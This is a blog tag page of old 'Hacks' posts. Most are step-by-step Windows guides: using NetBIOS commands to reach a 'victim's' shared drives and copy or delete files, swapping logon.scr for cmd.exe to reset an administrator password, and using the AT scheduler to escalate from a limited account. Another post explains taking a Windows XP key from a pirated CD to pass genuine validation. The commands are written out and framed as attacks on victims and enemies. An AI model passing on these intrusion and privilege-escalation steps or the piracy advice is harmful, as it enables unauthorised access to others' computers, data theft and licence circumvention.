Best 2 Know

The Ultimate Blogging Resource

  • Advertising
  • WebHosting
  • Contact Us
  • Blogger
    • Blogger Templates
    • Blogger Tutorials
  • Browser
    • Firefox
    • Google Chrome
  • Google
  • Internet
    • Facebook
    • Twitter
  • Thesis
  • Windows
  • WordPress
    • WordPress Themes
    • WordPress Plugins
  • More
    • Linux
    • Review
    • Solutions
    • Announcements

Tag: Hacks

Remote Shut Down Computers on LAN

Do you have a LAN (Local Area Network) ? Now you can shut down your PC from your friends PC who is in the same LAN….pretty useful if u wanna stay over for a longer time…Here is the way to go about doing it.

1. Right click on desktop, create new short-cut.

2. Type shutdown.exe -i

3. Click next, type in name for your short-cut e.g. shutdown computers

4. Click finish.

5. Run the short-cut you just created. Now you can browse the network for computers to shutdown/reboot etc. or just type in the IP/Name of the computer.

You can even broadcast a message, and schedule the shutdown.

Cool for sysadmins.

NOTE: You will only be able to shut down computers that you have admin access on!

March 1, 2009 Ritesh Sanap Internet, Solutions, Windows Cool things, Hacks

NETBIOS Hacking :II

This Last NETBIOS Hacking Is different From This is one another NETBIOS Hack .
THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER.NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.

STEP-BY-STEP NETBIOS HACKING PROCEDURE

1.Open command prompt

2. In the command prompt use the “net view” command
( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP-TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS.BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).

Example: C:\>net view \\219.64.55.112

The above is an example for operation using command prompt.”net view” is one of the netbios command to view the shared resources of the remote computer.Here “219.64.55.112? is an IP address of remote computer that is to be hacked through Netbios.You have to substitute a vlaid IP address in it’s place.If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown.If not an error message is displayed. So repeat the procedure 2 with a different IP address.

3. After succeeding, use the “net use” command in the command prompt.The “net use” is another netbios command which makes it possible to hack remote drives or printers.

Example-1:
C:\>net use D: \\219.64.55.112\F
Example-2:
C:\>net use G: \\219.64.55.112\SharedDocs
Example-3:
C:\>net use I: \\219.64.55.112\Myprint

NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.

NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES,FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER.THAT IS IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT

F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer.These are displayed after giving “net use” command. “219.64.55.112? is the IP address of remote computer that you want to hack.

4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.

Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name.You can open it and access remote computer’s Hard-Drive.You can copy files,music,folders etc. from victim’s hard-drive.You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system.You can access files\folders quickly through “Command Prompt”.

NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios.That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed).So Repeat The Procedure 2,3 With Different IP Address.

HAPPY NETBOS HACKING!!

March 1, 2009 Ritesh Sanap Internet, Solutions, Windows Cool things, Hacks

Getting original xp key from pirated XP CD!!


There is one simple method to get original Windows Xp Key From Pirated Windows Xp .As many people buy pirated one instead of original cd’s because pirated ones are cheapest and original are costly but as Microsoft Traces block the keys of user sometimes or sometimes says about genuine windows And to buy them order them ect…..

1.) Insert the CD in your drive.
2.) Right click it and select open.
3.) Open the folder named I386.
4.) In this folder there is a note pad file UNATTEND.txt
5.) Open this file and browse till the last line.
6.) You’ll find there a original xp key.
7.) Use this key while installing xp and there are 98% chance that your copy of XP will come out of Windows validation as a geniune copy.

February 28, 2009 Ritesh Sanap Internet, Solutions, Windows Cool things, Hacks

NETBIOS TRICK : Hack your victim online

After Last Few password Hacks this one more To hack the password a online Victim.Hack your enemy and destroy him this is your main mission. This hacks are working but it are just for knowledge.

NETBOIS HACKING
.

NetBios trick for windows 95/98/ME/NT/XP

Step 1
Get a IP (range) scanner. (superscanner is a fast one).
Scan the victim’s ip on TCP/IP port 139

Step 2
Open a dos prompt
Do this by going to start/run
enter command.com and press ok

this is what you see:
c:windows>

This is what you need to type down:
Replace 255.255.255.255 with the victims IP address.

c:windows>nbtstat -a 255.255.255.255

If you see this your in:

NetBIOS Remote Machine Name Table

Name Type Status
—————————————————————
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx
—————————————————————

If you don’t get the number <20>.
The victim disabled the File And Printer Sharing, find a another victim.

Step 3

type down:

c:windows>net view 255.255.255.255

if the output is like this:

Shared resources at 255.255.255.255
ComputerNameGoesHere

Sharename Type Used as Comment

————————————————————
CDISK Disk xxxxx xxxxx

The command completed successfully.

“DISK” shows that the victim is sharing a Disk named as CDISK

Step 4

type down:
you can replace x: by anything letter yopu want but not your own drive letters.
CDISK is the name of the shared harddrive.

c:windows>net use x: 255.255.255.255CDISK

If the command is successful we will get the confirmation.
The command was completed successfullly

Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:> . Now your are a small time hacker.
Good luck.

February 28, 2009 Ritesh Sanap Internet, Solutions, Windows Cool things, Hacks

Hack windows xp passwords: For FAT32 System

Early on I gave the trick to hack the password of administrator . this is the same trick but by different way. just increase your knowledge.

This hack doesn’t work on NTFS systems

Here are the steps involved to Hack the Window XP Administrator Password .
1. Go to Start –> Run –> Type in CMD

2. You will get a command prompt. Enter these commands the way it is given

3. cd\

4. cd\ windows\system32

5. mkdir temphack

6. copy logon.scr temphack\logon.scr

7. copy cmd.exe temphack\cmd.exe

8. del logon.scr

9. rename cmd.exe logon.scr

10. exit
Wait its not over read the rest to find out how to Hack the Window XP Administrator Password

A Brief explanation of what you are currently doing here is Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.
So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command
net user password
Example: If the admin user name is clazh and you want change the password to pass Then type in the following command
net user clazh pass
This will chang the admin password to pass.Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.


 Check hack xp password trick 

This hack doesn’t work on NTFS systems

February 28, 2009 Ritesh Sanap Solutions, Windows Cool things, Hacks

Crack into admin acc from limited account(99.99% works)

Yesterday I Recieve mail to ask me a easy trick to hack administrator account so I thought Should Post After many technical hacks. I tried it and it works 100% so u to crack into your administrator Account.


Go to cmd
type AT (time) /interactive “cmd.exe”
enter time in 24hr format
means if you want to enter 5.00pm then enter 17:00
then a new window of cmd will open at specified time
In new window type net(space)user
press enter
after this u will see some names on ur screen
notedown the name of admin acc
then type
net user (name of admin acc u want to crack into) *
e.g if the name of admin acc is john then type
net user john *
then it will ask u for new password
enter password of ur choice
and u got the admin password

Enjoy……………………..

February 28, 2009 Ritesh Sanap Solutions, Windows Cool things, Hacks

How to Find Windows XP CD-Key inside CD – in just 9 seconds

Well this is one of the most Amazing Trick I have found out. And it unbelievable .. but yet working.
Ever thought that the CD-Key of the Windows XP disc you were looking for was just Right Under you Nose. Lets see how easily you can get it…

July 25, 2008 Ritesh Sanap Solutions, Windows Cool things, Hacks, Tutorials

Posts pagination

Previous page Page 1 … Page 4 Page 5

Currently Trending

  • How to download Specific parts of YouTube videos
    How to download Specific parts of YouTube videos
  • Windows Vista CD key
    Windows Vista CD key
  • How to retrieve my Demonoid username
    How to retrieve my Demonoid username
  • How to add Logo to Thesis theme
    How to add Logo to Thesis theme
  • How to Delete Feedbacks from JetPack Contact Form
    How to Delete Feedbacks from JetPack Contact Form
  • List Of All 255 Keyboard All Alt Key Codes
    List Of All 255 Keyboard All Alt Key Codes
  • h4x0r ( Hacker ) - Blogger Template
    h4x0r ( Hacker ) - Blogger Template

Get Latest post in your Inbox

Random Posts

Creating custom couter strikes 1.6 sprays

January 16, 2008 By Ritesh Sanap Leave a Comment

Asino/Thesis Style footer for blogger

May 3, 2011 By Ritesh Sanap 18 Comments

How to add Favicon to your WordPress site

February 3, 2012 By Ritesh Sanap Leave a Comment

SkipScreen:Download From Rapid Share,Mega upload,Media Fire or Any Hosting SiteWith Out Waiting For Seconds (Download In Single Click)

May 16, 2010 By Ritesh Sanap Leave a Comment

How to Create Multiple Excerpts in WordPress

December 24, 2013 By Ritesh Sanap Leave a Comment

WordPress

HTTP2 Server Push for W3 Total Cache Minify plugin

August 17, 2016 By Ritesh Sanap 5 Comments

How to Disable Emojis in WordPress

January 6, 2016 By Ritesh Sanap Leave a Comment

JetPack Related posts and Sharing not working with NGINX

November 10, 2015 By Ritesh Sanap Leave a Comment

Simply Pure – WordPress Theme

November 2, 2014 By Ritesh Sanap 2 Comments

Advanced What should we Write about next? – WordPress Plugin

July 28, 2014 By Ritesh Sanap Leave a Comment

How to Disable Self Pingback or TrackBack

January 16, 2014 By Ritesh Sanap Leave a Comment

BlueStrap – WordPress Theme

January 1, 2014 By Ritesh Sanap 15 Comments

How to Create Multiple Excerpts in WordPress

December 24, 2013 By Ritesh Sanap Leave a Comment

How to Disable Auto Update in WordPress

November 21, 2013 By Ritesh Sanap Leave a Comment

How to Delete Feedbacks from JetPack Contact Form

November 19, 2013 By Ritesh Sanap 9 Comments

Recent Posts

  • HTTP2 Server Push for W3 Total Cache Minify plugin
  • How to show hidden files and folders in Mac OS X
  • How to Disable Emojis in WordPress
  • Canva – Online Photo Editor
  • JetPack Related posts and Sharing not working with NGINX

Archives

Recommends

  • DigitalOcean – Cloud Hosting
  • Dropbox – Cloud Storage
  • Elegant Themes – WordPress Themes
  • LastPass – Password Manager
  • Like us on Facebook
  • Follow on Twitter
  • +1 on Google
  • Subscribe via Email
  • RSS Feed

© 2025 Best 2 Know · All Rights Reserved · We ♥ DigitalOcean